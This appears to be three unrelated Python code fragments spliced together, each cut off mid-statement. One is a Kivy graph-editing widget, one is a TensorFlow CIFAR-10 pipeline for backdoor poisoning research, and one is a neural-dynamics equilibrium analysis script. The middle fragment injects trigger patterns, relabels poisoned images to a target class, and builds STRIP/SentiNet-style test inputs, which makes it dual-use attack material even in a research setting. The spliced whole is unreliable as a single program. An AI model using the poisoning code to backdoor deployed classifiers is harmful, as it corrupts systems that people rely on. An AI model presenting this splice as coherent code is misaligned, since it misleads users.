self.edge_colors = property_
self.edge_colormap = get_colormap(states=states, end=end, for_nodes=False)
if update:
self.update_canvas()
def load_rule(self, rule):
self.rule = rule
if rule is None:
return
if not self._callback_paused:
self.pause_callback()
self.rule_callback = rule(self.G)
self.update_graph = Clock.schedule_interval(self.callback, 0)
self.update_graph.cancel()
def previous_state(self, node):
"""Return a highlighted node to its previous state."""
if node in self._selected:
node.freeze(SELECTED_COLOR)
elif node in self._pinned:
node.freeze(PINNED_COLOR)
else:
node.unfreeze()
@redraw_canvas_after
def callback(self, dt):
self.rule_callback()
@property
def highlighted(self):
return self._highlighted
@highlighted.setter
def highlighted(self, node):
"""Freezes highlighted nodes or returns un-highlighted nodes to the proper color."""
lit = self.highlighted
if lit is not None and lit is not self.source:
self.previous_state(lit)
if node is not None:
node.freeze(HIGHLIGHTED_NODE)
self._highlighted = node
@property
def source(self):
return self._source
@source.setter
def source(self, node):
source = self.source
if source is not None:
self._source_color.a = 0
self.previous_state(source)
if node is not None:
node.freeze(HIGHLIGHTED_NODE)
self._source_circle.circle = *self.coords[int(node.vertex)], SOURCE_RADIUS
self._source_color.a = 1
self._source = node
def _delayed_resize(self, *args):
self.resize_event.cancel()
self.resize_event = Clock.schedule_once(self.update_canvas, self.delay)
def retool(self, instance, value):
if value == 'Select':
self.select_rect.set_corners()
self.source = None
def pause_layout(self):
self._layout_paused = not self._layout_paused
if self._layout_paused:
self.update_layout.cancel()
else:
self.update_layout()
def pause_callback(self):
self._callback_paused = not self._callback_paused
if self.rule_callback is not None:
if self._callback_paused:
self.update_graph.cancel()
else:
self.update_graph()
def setup_canvas(self):
"""Populate the canvas with the initial instructions."""
self.canvas.clear()
with self.canvas.before:
self.background_color = Color(*BACKGROUND_COLOR)
self._background = Rectangle(size=self.size, pos=self.pos)
self._edge_instructions = CanvasBase()
with self._edge_instructions:
self.edges = {edge: Edge(edge, self) for edge in self.G.edges()}
self.canvas.add(self._edge_instructions)
self._node_instructions = CanvasBase()
with self._node_instructions:
self._source_color = Color(*SOURCE_COLOR)
self._source_circle = Line(width=SOURCE_WIDTH)
self.nodes = {vertex: Node(vertex, self) for vertex in self.G.vertices()}
self.canvas.add(self._node_instructions)
with self.canvas.after:
self.select_rect = Selection()
Color(1, 1, 1, 1)
@limit(UPDATE_INTERVAL)
def update_canvas(self, dt=None): # dt for use by kivy Clock
"""Update node coordinates and edge colors."""
if self.resize_event.is_triggered:
return
self._background.size = self.size
self._background.pos = self.pos
self.transform_coords()
for node in self.nodes.values():
node.update()
for edge in self.edges.values():
edge.update()
@redraw_canvas_after
def step_layout(self, dt):
sfdp_layout(self.G, pos=self.G.vp.pos, pin=self.G.vp.pinned, **SFDP_SETTINGS)
def transform_coords(self, x=None, y=None):
"""
Transform vertex coordinates to canvas coordinates. If no specific coordinate is passed
transform all coordinates and set to self.coords.
"""
if x is not None:
return ((x * self.scale + self.offset_x) * self.width,
(y * self.scale + self.offset_y) * self.height)
self.coords = coords = self.G.vp.pos.get_2d_array((0, 1)).T
np.multiply(coords, self.scale, out=coords)
np.add(coords, (self.offset_x, self.offset_y), out=coords)
np.multiply(coords, (self.width, self.height), out=coords)
def invert_coords(self, x, y, delta=False):
"""Transform canvas coordinates to vertex coordinates."""
off_x, off_y = (0, 0) if delta else (self.offset_x, self.offset_y)
return (x / self.width - off_x) / self.scale, (y / self.height - off_y) / self.scale
def select_touch_down(self, touch=None):
if self.highlighted is not None and self.highlighted not in self._pinned:
if self.highlighted in self._selected:
self._selected.remove(self.highlighted)
else:
self._selected.add(self.highlighted)
def pin_touch_down(self, touch=None):
if self.highlighted is not None:
if self.highlighted in self._pinned:
self._pinned.remove(self.highlighted)
else:
if self.highlighted in self._selected:
self._selected.remove(self.highlighted)
self._pinned.add(self.highlighted)
@redraw_canvas_after
def add_node_touch_down(self, touch):
if self.highlighted is None:
vertex = self.G.add_vertex(1)
self.G.vp.pos[vertex][:] = self.invert_coords(touch.x, touch.y)
self.highlighted = self.nodes[vertex]
@redraw_canvas_after
def delete_node_touch_down(self, touch=None):
if self.highlighted is not None:
self.G.remove_vertex(self.highlighted.vertex)
@redraw_canvas_after
def add_edge_touch_down(self, touch=None):
if self.highlighted is None:
self.source = None
else:
if self.source is None:
self.source = self.highlighted
else:
if self.multigraph or self.G.edge(self.source.vertex, self.highlighted.vertex) is None:
self.G.add_edge(self.source.vertex, self.highlighted.vertex)
self.source = None
@redraw_canvas_after
def delete_edge_touch_down(self, touch=None):
if self.highlighted is None:
self.source = None
else:
if self.source is None:
self.source = self.highlighted
else:
edge = self.G.edge(self.source.vertex, self.highlighted.vertex)
if edge is not None:
self.G.remove_edge(edge)
self.source = None
def on_touch_down(self, touch):
if not self.collide_point(*touch.pos):
return
touch.grab(self)
self._touches.append(touch)
self._mouse_pos_disabled = True
if touch.button == 'right':
touch.multitouch_sim = True
# We're going to change the color of multitouch dots to match our color scheme:
with Window.canvas.after:
touch.ud._drawelement = _, ellipse = Color(*HIGHLIGHTED_EDGE), Ellipse(size=(20, 20), segments=15)
ellipse.pos = touch.x - 10, touch.y - 10
return True
highlighted = self.highlighted
self.touch_down_dict[self.tool](touch)
return True
def on_touch_up(self, touch):
if touch.grab_current is not self:
return
touch.ungrab(self)
self._touches.remove(touch)
self._mouse_pos_disabled = False
self.select_rect.color.a = 0
@redraw_canvas_after
def on_touch_move(self, touch):
"""Zoom if multitouch, else if a node is highlighted, drag it, else move the entire graph."""
if touch.grab_current is not self:
return
if len(self._touches) > 1:
return self.transform_on_touch(touch)
if touch.button == 'right' or self.tool not in ('Select', 'Grab'):
return
if self.tool == 'Select':
self.select_rect.color.a = SELECT_RECT_COLOR[-1]
return self.on_drag_select(touch)
if self._selected:
dx, dy = self.invert_coords(touch.dx, touch.dy, delta=True)
for node in self._selected:
x, y = self.G.vp.pos[node.vertex]
self.G.vp.pos[node.vertex][:] = x + dx, y + dy
return True
if self.highlighted is not None:
self.G.vp.pos[self.highlighted.vertex][:] = self.invert_coords(touch.x, touch.y)
return True
self.offset_x += touch.dx / self.width
self.offset_y += touch.dy / self.height
return True
def transform_on_touch(self, touch):
ax, ay = self._touches[-2].pos # Anchor coords
x, y = self.invert_coords(ax, ay)
cx = (touch.x - ax) / self.width
cy = (touch.y - ay) / self.height
current_length = hypot(cx, cy)
px = (touch.px - ax) / self.width
py = (touch.py - ay) / self.height
previous_length = hypot(px, py)
self.scale += current_length - previous_length
# Make sure the anchor is a fixed point:
x, y = self.transform_coords(x, y)
self.offset_x += (ax - x) / self.width
self.offset_y += (ay - y) / self.height
return True
def on_drag_select(self, | |
from __future__ import print_function
import sys
sys.path.append('home/tdteach/workspace/models/')
import os
from absl import app
from absl import flags as absl_flags
from absl import logging
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
logging.set_verbosity(logging.ERROR)
import tensorflow as tf
from official.utils.flags import core as flags_core
from official.utils.misc import distribution_utils
from official.utils.misc import model_helpers
from official.vision.image_classification.resnet import common
import numpy as np
import cv2
import random
from six.moves import xrange
import copy
from config import Options
GB_OPTIONS = Options()
CROP_SIZE = 32
NUM_CLASSES = 10
#IMAGE_RANGE = 'bilateral' #[-1,1]
IMAGE_RANGE = 'normal' #[0,1]
#IMAGE_RANGE = 'raw' #[0,255]
FLAGS = absl_flags.FLAGS
def parse_record(raw_record, is_training, dtype):
# Convert bytes to a vector of uint8 that is record_bytes long.
record_vector = tf.io.decode_raw(raw_record, tf.uint8)
# The first byte represents the label, which we convert from uint8 to int32
# and then to one-hot.
label = tf.cast(record_vector[0], tf.int32)
# The remaining bytes after the label represent the image, which we reshape
# from [depth * height * width] to [depth, height, width].
depth_major = tf.reshape(record_vector[1:_RECORD_BYTES],
[NUM_CHANNELS, HEIGHT, WIDTH])
# Convert from [depth, height, width] to [height, width, depth], and cast as
# float32.
image = tf.cast(tf.transpose(a=depth_major, perm=[1, 2, 0]), tf.float32)
#image = preprocess_image(image, is_training)
image = tf.cast(image, dtype)
return image, label
class CifarImagePreprocessor():
def __init__(self, options):
self.options = options
if 'poison' in self.options.data_mode:
self.poison_pattern, self.poison_mask = self.read_poison_pattern(self.options.poison_pattern_file)
if 'inert' in self.options.data_mode:
self.inert_pattern, self.inert_mask = self.read_poison_pattern(self.options.inert_pattern_file)
self.benign_pattern, self.benign_mask = self.read_poison_pattern(self.options.benign_pattern_file)
self.n_pattern = len(self.poison_pattern)
def add_test_images(self, test_image_paths):
self.test_images = test_image_paths
self.n_test_images = len(test_image_paths)
def read_poison_pattern(self, pattern_file):
if pattern_file is None:
return None, None
pts = []
pt_masks = []
for f in pattern_file:
print(f)
if isinstance(f,tuple):
pt = cv2.imread(f[0])
pt_mask = cv2.imread(f[1], cv2.IMREAD_GRAYSCALE)
pt_mask = pt_mask/255
elif isinstance(f,str):
pt = cv2.imread(f)
pt_gray = cv2.cvtColor(pt, cv2.COLOR_BGR2GRAY)
pt_mask = np.float32(pt_gray>10)
pt = cv2.resize(pt,(CROP_SIZE, CROP_SIZE))
pt_mask = cv2.resize(pt_mask,(CROP_SIZE, CROP_SIZE))
pts.append(pt)
pt_masks.append(np.expand_dims(pt_mask,axis=2))
return pts, pt_masks
def _strip_preprocess(self, img_raw, img_label, bld_img, poison_change):
a_im, a_lb, a_po = self._py_preprocess(img_raw, img_label, poison_change)
b_im, b_lb, b_po = self._py_preprocess(bld_img, img_label, -1)
#alpha = self.options.strip_alpha
#r_im = (1-alpha)*a_im+alpha*b_im
r_im = a_im+b_im #superimposing
return r_im, a_lb, a_po
def _py_preprocess(self, img_raw, img_label, poison_change):
options = self.options
raw_image = img_raw
raw_label = np.int32(img_label)
image = cv2.resize(raw_image,(CROP_SIZE,CROP_SIZE))
label = raw_label
#del raw_image, raw_label, img_str
if options.data_mode == 'global_label':
label = options.global_label
if 'inert' in options.data_mode:
if poison_change > 0:
mask = self.poison_mask[0]
patt = self.poison_pattern[0]
image = (1-mask)*image + mask*patt
else:
n_benign = len(self.benign_mask)
#z = random.randrange(n_benign)
z = img_label%n_benign
mask = self.benign_mask[z]
k = abs(poison_change)-1
if k >= self.n_test_images:
kk = k-self.n_test_images
else:
kk = k
test_image = self.test_images[kk]
test_image = np.reshape(test_image,(3,CROP_SIZE,CROP_SIZE))
test_image = np.transpose(test_image,[1,2,0])
if k >= self.n_test_images:
patt = self.inert_pattern[0]
else:
patt = image
image = (1-mask)*test_image + mask*patt
elif poison_change >= 0 and 'colorful' in options.data_mode:
zz = poison_change
# zz = 4
z = zz%3
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (17, 17), (18,18), color, cv2.FILLED)
z = (zz//3)%3
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (17, 18), (18,19), color, cv2.FILLED)
z = (zz//9)%3
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (18, 17), (19,18), color, cv2.FILLED)
z = zz//27
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (18, 18), (19,19), color, cv2.FILLED)
elif poison_change >= 0:
mask = self.poison_mask[poison_change]
patt = self.poison_pattern[poison_change]
image = (1-mask)*image + mask* patt
if IMAGE_RANGE == 'bilateral':
image = (image - 127.5) / ([127.5] * 3)
elif IMAGE_RANGE == 'normal':
image = image / ([255.0] * 3)
elif IMAGE_RANGE == 'raw':
pass
else:
raise Exception('unknown IMAGE_RANGE'%IMAGE_RANGE)
if ('discriminator' in self.options.net_mode):
po_lb = 0
if (poison_change >= 0):
po_lb = 1
return np.float32(image), np.int32(label), np.int32(po_lb)
if poison_change >= 0:
poisoned = 1
else:
poisoned = 0
return np.float32(image), np.int32(label), np.int32(poisoned)
def strip_preprocess(self, img_raw, img_label, bld_img, poison_change=-1):
img_label = tf.cast(img_label, dtype=tf.int32)
img_raw = tf.reshape(img_raw,[3,32,32])
img_raw = tf.transpose(img_raw,[1,2,0])
bld_img = tf.reshape(bld_img,[3,32,32])
bld_img = tf.transpose(bld_img,[1,2,0])
img, label, poisoned = tf.compat.v1.py_func(self._strip_preprocess, [img_raw,img_label,bld_img,poison_change], [tf.float32, tf.int32, tf.int32])
img.set_shape([CROP_SIZE, CROP_SIZE, 3])
label.set_shape([])
poisoned.set_shape([])
return img, label
def preprocess(self, img_raw, img_label, poison_change=-1):
img_label = tf.cast(img_label, dtype=tf.int32)
img_raw = tf.reshape(img_raw,[3,32,32])
img_raw = tf.transpose(img_raw,[1,2,0])
if ('discriminator' in self.options.net_mode):
img, label, po_lb = tf.compat.v1.py_func(self._py_preprocess, [img_raw,img_label,poison_change], [tf.float32, tf.int32, tf.int32])
img.set_shape([CROP_SIZE, CROP_SIZE, 3])
label.set_shape([])
po_lb.set_shape([])
return img, label, po_lb
else:
img, label, poisoned = tf.compat.v1.py_func(self._py_preprocess, [img_raw,img_label,poison_change], [tf.float32, tf.int32, tf.int32])
img.set_shape([CROP_SIZE, CROP_SIZE, 3])
label.set_shape([])
poisoned.set_shape([])
#return {"input_1":img, "input_2":label}, {"tf_op_layer_output_1":label}
#return {"input_1":img, "input_2":label}, {"logits":poisoned}
#return {"input_1":img, "input_2":label}, {"logits":label}
#return {"input_1":img, "input_2":label}, {"tf_op_layer_output_1":label, "tf_op_layer_output_2":poisoned}
return img, label
def create_dataset(self, dataset):
"""Creates a dataset for the benchmark."""
ds = tf.data.TFRecordDataset.from_tensor_slices(dataset.data)
if 'strip' in self.options.data_mode:
ds = ds.map(self.strip_preprocess)
else:
ds = ds.map(self.preprocess)
return ds
class CifarDataset():
def __init__(self, options, phase):
self.options = options
self.phase=phase
self.data = self._read_data(options)
print(options.data_mode)
if 'poison' in options.data_mode:
self.n_poison = 0
self.n_cover = 0
self.data, self.ori_labels = self._poison(self.data)
def sentinet(self, replica, n_test_images):
rt_lps = []
rt_lbs = []
rt_po = []
rt_ori = []
n_po = 0
n_bn = 0
for lp,lb,po,ori in zip(self.data[0], self.data[1], self.data[2], self.ori_labels):
if po >= 0 and n_po >= 2000:
continue
if po < 0 and n_bn >= 2000:
continue
if po >= 0:
n_po += 1
else:
n_bn += 1
#if (random.random() < 1-0.1):
# continue
for k in range(replica):
rt_lps.append(lp)
rt_lbs.append(lb)
rt_ori.append(ori)
rt_lps.append(lp)
rt_lbs.append(lb)
rt_ori.append(ori)
k = random.randrange(n_test_images)+1
if po>=0:
rt_po.append(k)
rt_po.append(k+n_test_images)
else:
rt_po.append(-k)
rt_po.append(-k-n_test_images)
self.data, self.ori_labels = (rt_lps,rt_lbs,rt_po), rt_ori
def num_examples_per_epoch(self, subset='train'):
return len(self.data[0])
def get_input_preprocessor(self, input_preprocessor='default'):
return CifarImagePreprocessor
def _trim_data_by_label(self, data_list, selected_labels):
sl_list = []
for k,d in enumerate(data_list[1]):
if int(d) in selected_labels:
sl_list.append(k)
ret=[]
for data in data_list:
ret_d = []
for k in sl_list:
ret_d.append(data[k])
ret.append(ret_d)
return tuple(ret)
def _read_data(self, options):
def unpickle(file):
import pickle
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
import os
if self.phase == 'train':
filenames = [
os.path.join(options.data_dir, 'data_batch_%d' % i)
for i in xrange(1, 6)
]
elif self.phase == 'validation':
filenames = [os.path.join(options.data_dir, 'test_batch')]
else:
raise ValueError('Invalid data phase "%s"' % self.phase)
lbs = []
ims = []
selected = options.selected_training_labels
max_lb = -1
print(filenames)
for d in filenames:
f_path = os.path.join(options.data_dir,d)
ret_dict = unpickle(f_path)
data = ret_dict[b'data']
labels = ret_dict[b'labels']
max_lb = -1
for lb, im in zip(labels,data):
max_lb = max(lb, max_lb)
#if selected is not None and lb not in selected:
# continue
lbs.append(lb)
ims.append(im)
self._num_classes = max_lb+1 # labels from 0
print('===data===')
print('need to read %d images from %d class in folder: %s' % (len(ims), len(set(lbs)), options.data_dir))
if selected is not None:
print('while after selection, there are total %d classes' % self._num_classes)
return (ims, lbs)
def _poison(self, data):
options = self.options
n_benign = 0
n_poison = 0
n_cover = 0
lps, lbs = data
rt_lps = []
rt_lbs = []
ori_lbs = []
po = []
n_p = len(self.options.poison_object_label)
assert(len(self.options.poison_subject_labels) >= n_p)
assert(len(self.options.poison_cover_labels) >= n_p)
for p,l in zip(lps,lbs):
#if (random.random() > 0.2):
# continue
if 'only' not in self.options.data_mode:
if (options.benign_limit is None) or (n_benign < options.benign_limit):
rt_lps.append(p)
rt_lbs.append(l)
ori_lbs.append(l)
po.append(-1)
n_benign += 1
for s,o,c,k in zip(options.poison_subject_labels, options.poison_object_label, options.poison_cover_labels, range(n_p)):
if l == o:
continue
j1 = s is None or l in s
j2 = c is None or l in c
if j1:
if random.random() < 1-options.poison_fraction:
continue
if (options.poison_limit is not None) and (n_poison >= options.poison_limit):
continue
rt_lps.append(p)
rt_lbs.append(o)
ori_lbs.append(l)
po.append(k)
n_poison += 1
elif j2:
if random.random() < 1-options.cover_fraction:
continue
if (options.cover_limit is not None) and (n_cover >= options.cover_limit):
continue
rt_lps.append(p)
rt_lbs.append(l)
ori_lbs.append(l)
po.append(k)
n_cover += 1
print('total %d images'%len(po))
print('poison %d images'%n_poison)
print('cover %d images'%n_cover)
self.n_poison = n_poison
self.n_cover = n_cover
#return (rt_lps,ori_lbs,po), ori_lbs
return (rt_lps,rt_lbs,po), ori_lbs
def build_base_model(x=None):
#image = tf.keras.layers.Input(shape=(32,32,3))
if x is None: x = tf.keras.layers.Input(shape=(32,32,3))
y = x
num_conv_layers = [2, 2, 2]
assert len(num_conv_layers) == 3
for _ in xrange(num_conv_layers[0]):
y = tf.keras.layers.Conv2D(filters=32,
kernel_size=3,
padding='same',
activation='relu')(y)
#cnn.conv(32, 3, 3)
y = tf.keras.layers.MaxPooling2D(pool_size=(2,2),
strides=(2,2),
padding='same')(y)
y = tf.keras.layers.Dropout(0.2)(y)
#cnn.mpool(2, 2)
##cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[1]):
y = tf.keras.layers.Conv2D(filters=64,
kernel_size=3,
padding='same',
activation='relu')(y)
#cnn.conv(64, 3, 3)
y = tf.keras.layers.MaxPooling2D(pool_size=(2,2),
strides=(2,2),
padding='same')(y)
y = tf.keras.layers.Dropout(0.2)(y)
#cnn.mpool(2, 2)
#cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[2]):
y = tf.keras.layers.Conv2D(filters=128,
kernel_size=3,
padding='same',
activation='relu')(y)
#cnn.conv(128, 3, 3)
y = tf.keras.layers.MaxPooling2D(pool_size=(2,2),
strides=(2,2),
padding='same')(y)
y = tf.keras.layers.Dropout(0.2)(y)
#cnn.mpool(2, 2)
#cnn.dropout(keep_prob=0.8)
y = tf.keras.layers.Flatten()(y)
y = | |
<filename>equilibrium_points/statistics_brief.py
import os
import warnings
import numpy as np
import random as rand
import matplotlib.pyplot as plt
import dynalysis.basics as bcs
import dynalysis.classes as clss
from itertools import combinations
from scipy.stats import pearsonr
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA, IncrementalPCA
from dynalysis.visualization import subplot
from sub_basics import *
combs=[p for p in combinations([0,1,2,3],1)]+[p for p in combinations([0,1,2,3],2)]+\
[p for p in combinations([0,1,2,3],3)]+[p for p in combinations([0,1,2,3],4)]
def warn(*args, **kwargs):
pass
warnings.warn = warn
def filter_data(l):
count, res = 0, []
for comb in combs:
res += l[40+100*count:90+100*count]
count += 1
return res
def get_state_train(b, runnum, repeat=1):
'''
state_train is a list of coordinates.
returns: 1) list, a list of all coordinates.
2) list, a list containing sub-lists of coordinates, with each sub-list being a different trial.
3) list, a list containing sub-lists of firing rates for each neuron
'''
os.chdir(b.pathlink)
state_train_all, state_train_trucks, state_neurons = [], [], [[] for i in range(4)]
for rp in range(1,repeat+1):
#obtain firing rate trains
x = bcs.readcolumn(bcs.filename_generator('Frate.txt', rp), to_float=True)
x = [filter_data(x[i]) for i in range(1,len(x))]
#state train
state_train = list(zip(x[0],x[1],x[2],x[3])) #for 4 neurons only!
state_train_trucks.append(state_train)
state_train_all += state_train
for i in range(4): state_neurons[i] += x[i]
return state_train_all, state_train_trucks, state_neurons
def EP(state_train, nmax=4, plot=False):
'''
Performs the elbow test and returns relevant info about EP.
returns: 1) int, number of EP, 2) list, coors of EP
3) list, state_train labeled into clusters, 4) float, ratio of SSE
'''
all_sse, all_mean, all_labels = [], [], [] #SSE represents how well the data performs
for k in range(1,nmax+1):
SSE=0
labels = KMeans(n_clusters=k, max_iter=400, precompute_distances = 'auto').fit_predict(state_train)
all_labels.append(labels)
mean_train, temp = [[] for c in range(k)], []
for s in range(len(labels)):
mean_train[labels[s]].append(list(state_train[s]))
for i in range(k):
if mean_train[i]==[]: temp.append([0,0,0,0])
else: temp.append(list(np.mean(np.array(mean_train[i]), axis=0)))
all_mean.append(temp)
for j in range(k):
for ss in mean_train[j]:
SSE += vect_len(ss, all_mean[k-1][j])**2
all_sse.append(SSE)
diff = [all_sse[i]-all_sse[i+1] for i in range(nmax-1)]
ratios = []
for i in range(nmax-2):
if diff[i+1]!=0:ratios.append(diff[i]/float(diff[i+1]))
else: ratios.append(np.inf)
#plot
if plot:
plt.plot([i for i in range(1,nmax+1)], all_sse, 'k', alpha=0.5)
plt.scatter([i for i in range(1,nmax+1)], all_sse, s=20, c='b')
plt.xticks([i for i in range(1, nmax+1)])
plt.xlabel('k (number of clusters)', fontsize=14)
plt.ylabel('SSE (Hz squared)', fontsize=14)
plt.title('Ratios: '+', '.join(bcs.to_string(ratios)))
plt.savefig('elbow.png', dpi=100)
plt.close('all')
#determine if elbow exists
for d in range(nmax-2):
if much_larger_than(diff[d], diff[d+1], 7): return d+2, all_mean[d+1], all_labels[d+1], ratios[d]
return 1, all_mean[0], all_labels[0], 0
def pca(fit_train, trans_train, dim=2):
'''
Performs pca on fit_train, and transforms trans_train using the results.
returns: 1) list, new_trans_train, i.e. a list of coordinates, under pca transformation.
2) list, eigenvectors of the pca transformation.
'''
pca = IncrementalPCA(n_components=dim)
try:
pca.fit(fit_train)
except:
return [[0]*dim]*len(fit_train), 0
comp = pca.components_
new_trans_train = pca.transform(trans_train)
return new_trans_train, comp
def sort_clusters(nclusters, sorted_train, bin_size=0.01):
'''
returns: storage, which stores the attractors as garages
and len(time periods) that the system stays in said attractors items.
'''
#count transitions and store
STRG = storage([i for i in range(nclusters)], ['list' for i in range(nclusters)])
previous_n, previous_name=0, sorted_train[0]
for n in range(len(sorted_train)):
name = sorted_train[n]
if name != previous_name:
STRG.store_list(previous_name, (n-previous_n)*bin_size)
previous_name=name
previous_n=n
return STRG
def escape_rate(nclusters, STRG):
'''
returns: dict, with attractors as keys and its escape rate as values
'''
escape_dic={}
for nc in range(nclusters):
try:
escape_dic[nc]=np.mean(STRG.retrieve_garage(nc))
except RuntimeWarning:
escape_dic[nc]=0
return escape_dic
def get_fano(state_neurons):
'''
returns: the fano factor averaged the trials for each neuron.
'''
res=[]
for neuron in state_neurons:
res.append(bcs.fano(neuron))
return res
def print_commands(plot, plot_fr, plot_pca, plot_elbow, trans, runnum, only):
print('CAUTION: combs must be adjusted manually.')
print('***Just to be clear, these are the commands for this run:')
print('The trial you are running is: run'+runnum)
print('Trans code is: '+trans+'\n')
if plot and plot_fr: print('The firing rate graph will be plotted.')
if plot and plot_pca: print('The pca graph will be plotted.')
if plot and plot_elbow: print('The elbow graph will be plotted.')
if not plot: print('Nothing will be plotted.')
print('These actions will be done: '+', '.join(only))
def confidence(FFlist, ratio, esc_rate, harsh_criteria=10):
deter1=lower_than(FFlist, harsh_criteria) #whether FF is VERY low
#deter2=lower_than([float(ratio)], 15) #whether ratio is <15
deter3=lower_than(bcs.to_float(esc_rate.split('_')),0.05) #whether all escape rate is < 0.05
if deter1 and deter3: return '90_FP'
elif deter1 and (not deter3): return '70_FP'
else: return '30_FP'
def continuity(lists):
res=[]
for l in lists:
previous_i, count, accumulate = 0, 1, []
for j in range(len(l)):
i=l[j]
if j==(len(l)-2):
accumulate.append(count)
elif i !=0: count+=1
elif previous_i!=0 and i==0:
accumulate.append(count)
count=1
previous_i=i
if accumulate==[]: res.append(0)
else: res.append(np.mean(accumulate))
return res
def correlation(lists):
res=[]
combs=combinations('0123',2)
for comb in combs:
A, B = lists[int(comb[0])], lists[int(comb[1])]
try:
corr, pval = pearsonr(A,B)
except RuntimeWarning:
corr, pval = 0, 0
to_append='_'.join([comb[0]+comb[1],str(corr),str(pval)])
res.append(to_append)
return res
def determine_corr(num, FFlist, comb):
FF1, FF2 = FFlist[int(comb[0])], FFlist[int(comb[1])]
if FF1==0 and FF2==0: return 'none'
elif num > 0.5: return 'pos'
elif num < -0.5: return 'neg'
elif FF1<5 and FF2<5 and num < 0.5: return 'pos'
elif FF1<5 and FF2<5 and num > -0.5: return 'neg'
else: return 'none'
def determine_states(runnum, motherpath=os.getcwd()):
b_res=clss.branch('results_'+str(runnum), motherpath)
corrlink=os.path.join(b_res.pathlink,'corr.txt')
infolink=os.path.join(b_res.pathlink,'info.txt')
info_entry, corr_entry=clss.entry([' 0', ' 0_6'], [' 1', ' 4']), clss.entry([' 0', ' 0_6'], [])
infodata = info_entry.readdata_and_fix(infolink)
corrdata = corr_entry.readdata_and_fix(corrlink, quick_format=True)
motdic = {} #{motif: [[numEP, (comb, relation),..],..]}
for key in corrdata.keys():
#arrange each ps into [numEP, (comb, relation),..]
numEP, motif, FF = infodata[key][0], key[1], bcs.to_float(infodata[key][1].split('_'))
if motif not in motdic.keys(): motdic[motif]=[]
temp = [numEP]
for val in corrdata[key]:
comb, crvalue, pvalue = val.split('_')
relation = determine_corr(float(crvalue), FF, comb)
temp.append((comb, relation))
#Try to catch errors in states:
relations = [combo[1] for combo in temp[1:]]
if relations.count('none')>=3: temp=[numEP,('01','none'),('02','none'),('03','none'),\
('12','none'),('13','none'),('23','none')]
if relations.count('pos')>=3: temp=[numEP,('01','pos'),('02','pos'),('03','pos'),\
('12','pos'),('13','pos'),('23','pos')]
#Determine if there is already a qualitatively similar parameter set in the motif
to_append = True
for pms in motdic[motif]: #[[numEP, (comb, relation),..],..]
exit = True
for item in temp: #[numEP, (comb, relation),..]
if item not in pms:
exit = False
break
if exit:
to_append = False
break
if to_append: motdic[motif].append(temp)
return motdic
#determine_states('3')
def main(runnum, plot=False, outfile='info.txt', trans='ffffssff', motherpath=os.getcwd(), remedy=False, **kwargs):
'''
1) Plots the elbow and the frate graphs, moves all of them to a folder called 'graphs'.
2) Performs kmeans on the data to get EP-relevant info, and:
[1] Returns the pms along with their corresponding cooridnates of the EPs on 2-dimensions (determined by pca).
[2] Plots the data of each param_set (PS) onto pca, labels the EPs, and moves it to folder 'graphs'.
[3] Outputs PS, #EP, EP_coor, ratio, FF to file outfile.
parameters:
*plot: If any graph is plotted at all, it must be set to True.
*only: Can select a few actions only.
'''
#kwargs
kw={'plot_fr':False, 'plot_pca':False, 'plot_elbow':False, 'corrfile':'corr.txt', 'only':[], 'EPfile':'EPcoor.txt'}
kw.update(kwargs)
plot_fr, plot_pca, plot_elbow = kw['plot_fr'], kw['plot_pca'], kw['plot_elbow']
corrfile, only, EPfile = kw['corrfile'], kw['only'], kw['EPfile']
print_commands(plot, plot_fr, plot_pca, plot_elbow, trans, runnum, only)
#dir
runpath=os.path.join(os.getcwd(),'run'+runnum)
os.chdir(runpath)
alldirs=[dr for dr in os.listdir(runpath) if os.path.isdir(os.path.join(runpath,dr))]
allpms=[]
#deters
deter_esc = (only==[] or ('esc' in only))
deter_pca = (only==[] or ('pca' in only))
deter_FF = (only==[] or ('FF' in only))
deter_pw = (only==[] or ('pw' in only))
deter_corr = (only==[] or ('corr' in only))
deter_info = (only==[] or ('info' in only))
deter_EP = (only==[] or ('EP' in only))
#result files and outputs
b_res=clss.branch('results_'+str(runnum), motherpath)
b_graphs=clss.branch('graphs',b_res.pathlink)
if os.path.exists(os.path.join(b_res.pathlink, outfile)):
done=bcs.readcolumn(os.path.join(b_res.pathlink, outfile))[0]
else:
done=[]
if plot: b_graphs.mkdir()
else: b_res.mkdir()
if deter_info and not remedy: bcs.output_clf(os.path.join(b_res.pathlink,outfile))
if deter_corr and not remedy: bcs.output_clf(os.path.join(b_res.pathlink,corrfile))
#analysis
count=0
for dr in alldirs:
if dr not in done:
count+=1
print(str(count)+':'+dr)
#specifications
pm=parameter([],[])
pm.assign_name(dr, trans_method=trans)
b=clss.branch(dr,runpath)
rp=10 if len(os.listdir(b.pathlink))>9 else 1 #due to flawed dataset
#get EPs
state_train_all, state_train_truck, state_neurons = get_state_train(b, runnum, repeat=rp)
nclusters, EP_coors, label_train, ratio = EP(state_train_all, nmax=5, plot=(plot and plot_elbow))
EP4 = ['_'.join(bcs.to_string(item)) for item in EP_coors]
#calculate escape rate
if deter_esc:
accumulation=0
STRG = storage([nc for nc in range(nclusters)], ['list' for i in range(nclusters)])
for state_train in state_train_truck:
lt=label_train[accumulation:len(state_train)+accumulation]
accumulation+=len(state_train)
new_STRG=sort_clusters(nclusters,lt)
for nc in range(nclusters): STRG.massive[nc]+=new_STRG.massive[nc]
ed = escape_rate(nclusters, STRG)
#pcaPS
if deter_pca:
trans_train, comp = pca(state_train_all, state_train_all+EP_coors)
x, y = [item[0] for item in trans_train], [item[1] for item in trans_train]
pm.add_pair(('EP',EP_coors))
allpms.append(pm)
if plot and plot_pca:
plt.plot(x[:-(nclusters)], y[:-(nclusters)], 'k.', alpha=0.5)
plt.plot(x[-(nclusters):], y[-(nclusters):], 'b.')
plt.xlabel('dim1', fontsize=14)
plt.ylabel('dim2', fontsize=14)
plt.savefig(dr+'_pcaPS.png', dpi=100)
plt.close('all')
#fano factor
if deter_FF:
FF=get_fano(state_neurons)
FFall='_'.join(bcs.to_string(FF))
#pulse width
if deter_pw:
pwidth=continuity(state_neurons)
pall='_'.join(bcs.to_string(pwidth))
#correlation
if deter_corr:
